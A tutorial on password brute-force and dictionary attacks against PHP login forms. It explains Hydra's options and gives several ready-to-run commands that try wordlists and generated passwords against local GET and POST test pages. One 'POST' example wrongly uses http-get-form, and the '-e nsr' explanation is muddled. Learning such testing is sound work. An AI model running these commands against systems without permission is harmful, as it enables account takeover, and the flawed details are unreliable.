Brute-force and Dictionary attacks are attempts to find / break the user name or password by doing multiple attempts on a system. In today's software, we will see how we can attack a page with a username and password, using hydra and patator. The sample page to be used in this study and the attack page will be prepared as a php page.

Dictionary attacks are the type of attack done with the word pool. In the case of brute-force attacks, unlike the dictionary attack, it is an attempt to test all possibilities with the input defined as length and content. If you want to break a password or data, it is recommended to first attack the dictionary and then attack the brute force.

In this article both the 'POST' and the 'GET' method will be tested to break the user name and password field together. Since the machine to be tested and the site is the same machine, 127.0.0.1 will be used as the IP address. For different sites, this value must be replaced by the corresponding IP or domain name.
The contents of the HTML (PHP) page we use are linked below.

File Name: post_test.php

File Name: get_test.php

Tests will be done with Hydra on Kali Linux. Hydra has options to attack entries from a variety of different protocols, but in this article you will learn how to test the power of the HTTP Form password.

This manual will use the word lists and the brute force parameter to provide the inputs to be tested to the Hydra.

Let us try to find the password by running it separately for both GET and POST pages.
The following are descriptions of the parameter commands to be used for Hydra.

-l LOGIN Gets a single user name parameter (example usage: -l admin)
-L FILE Words that may come from a list are tried as user name (example use: -L example.txt)
-p PASS Gets a single password parameter (example usage: -p pass)
-P FILE Trying words from a list (example usage: -P example.txt)
-v or -V Verbose mode / login + password is shown for each trial.

-x min: max: charset
Creates passwords from minimum to maximum length. The character set can contain 1 for numbers, a for lowercase and A for uppercase characters. Any added characters are added to the list.
(Example Usage: -x 1:5:a1.)
The password length is between 1 and 5 characters, lowercase, and contains '.'.

-e nsr
Used for additional controls. For null password 'n' tries to log in with 's' user name, 'r' tries to make reverse entry with user name.

http[s]-{get|post}-form '1:2:3:4'
http- for HTTP and https- for HTTPS site tests.
http[s]-post-form for POST forms.
http[s]-get-form for GET forms.

'1:2:3:4'
1 page, 2 body content, 3 failure (F =) or success (S =) message, 4 (H =) headings (like cookie) can be specified (optional).
(Example Usage: /get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed)
When specifying the page value / should be remembered.
The username, password, and Login fields are the names of the form elements. Change these values ​​for different element names.

Warning: Hydra is a tool used to attack. Use only on your own systems and networks, unless you have written permission from the owner. Otherwise, its use is illegal.

Hydra usage examples for get_test.php:

hydra -L '/usr/share/wordlists/wfuzz/general/common.txt' -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P /usr/share/wordlists/wfuzz/general/common.txt -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V -e nsr 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:S=Login successful' 

hydra -l admin -x 5:5:a -v -V 127.0.0.1 http-get-form '/get_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed'

Hydra usage examples for post_test.php:

hydra -L '/usr/share/wordlists/wfuzz/general/common.txt' -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-post-form '/post_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -P '/usr/share/wordlists/wfuzz/general/common.txt' -v -V 127.0.0.1 http-get-form '/post_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed' 

hydra -l admin -x 1:5:a1 -v -V 127.0.0.1 http-post-form '/post_test.php:username=^USER^&password=^PASS^&Login=Login:F=Login failed'